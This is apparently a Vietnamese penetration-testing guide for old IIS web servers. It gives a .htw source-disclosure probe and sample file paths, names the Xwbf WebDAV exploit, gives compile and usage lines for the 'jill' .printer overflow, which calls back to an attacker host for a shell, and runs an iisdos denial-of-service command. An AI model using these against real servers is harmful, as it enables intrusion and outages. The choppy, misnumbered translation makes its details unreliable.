3. Đánh giá an toàn máy chủ web
3.1.2.8. WEBHITS.DLL và HTW Bug
Hiển thị mã nguồn ASP và các kịch bản khác.
http://www.target.com/nosuchfile.htw
Nếu bạn nhận được lỗi “định dạng Query_string là không hợp lệ”.
Điều kiện tiên quyết: Kiểm soát của CiWebhitsfile khi người sử dụng có kiểm soát đối số
CiWebhitsfile thông qua tập tin HTW . Bạn có thể tìm thấy các tập tin .HTW tại các điểm sau đây của các mãy chủ IIS khác nhau.
/iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /isssamples/exair/search/qfullhit.htw /isssamples/exair/search/qsumrhit.htw /isshelp/iss/misc/iirturnh.htw 3.4.3. Tràn bộ đệm
3.1.3.1. Web DAV
Nếu phương thưc TRACE được kích hoạt Xwbf-v0.3.exe. Nó hoạt động trên cổng 80 và yêu cầu kết nối từ mục tiêu. Hy vọng bạn sẽ tìm thấy tường lửa cho phép kết nối mục tiêu công cộng. Khai thác này cung cấp quyền truy cập root. Tường lửa cho doanh nghiệp sẽ không cho phép NetBios truy cập công cộng, nếu trong trường hợp cho phép nội bộ, SMBDie có thể được kiểm tra.
3.1.3.2. JILL
JILL được viết trong UNIX C, có thể biên dịch sử dụng Cygwin cho windows 2000. $ gcc -o jill jill.c
Nhị phân có thể được chạy từ vở Cygwin hoặc từ một giao diện điều khiển win32 nếu Cygwin.dll là trong đường dẫn.
$ ./jill
iis5 remote .printer overflow.
dark spyrit <dspyrit@beavuh.org> / beavuh labs.
usage: ./jill <targetHost> <targetPort> <attackerHost> <attackerPort>
3.4.4. DoS
Như đã chỉ ra bởi SPI động, các lỗ hổng trong IIS 5.0 và IIS 5.1 có thể dẫn tới từ chối dịch vụ. Tệ hơn nữa một phần là sẽ được điều khiển từ xa và gây ra khởi động lại các máy chủ.
#./iisdos
Usage : <I.P./Hostname> #./iisdos 172.16.169.17